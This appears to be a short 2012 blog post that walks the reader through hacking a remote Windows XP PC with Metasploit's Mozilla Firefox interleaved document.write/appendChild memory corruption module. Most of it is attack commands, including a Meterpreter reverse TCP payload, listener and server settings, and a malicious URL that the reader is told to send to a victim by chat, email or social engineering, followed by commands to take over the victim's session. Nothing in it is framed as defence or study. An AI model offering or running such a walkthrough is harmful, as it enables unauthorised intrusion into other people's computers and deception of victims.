Banner 480

Selasa, 05 Juni 2012

Hack Remote PC using Mozilla Firefox Interleaved document.write/append Child Memory Corruption

This module exploits code execution vulnerability in Mozilla Firefox caused by interleaved calls to document. Write and append Child. This module was written based on a live exploit found in the wild.

Exploit Targets
Firefox 3.6.11
Windows XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/mozilla_interleaved_write

Msf exploit (mozilla_interleaved_write)>set payload windows/meterpreter/reverse_tcp
Msf exploit (mozilla_interleaved_write)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (mozilla_interleaved_write)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (mozilla_interleaved_write)>set uripath firefox (The Url to use for this exploit)
Msf exploit (mozilla_interleaved_write)>exploit



Now an URL you should give to your victim http://192.168.1.2:8080/firefox


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Banner 480 bawah




Your Clicks! Your Earning!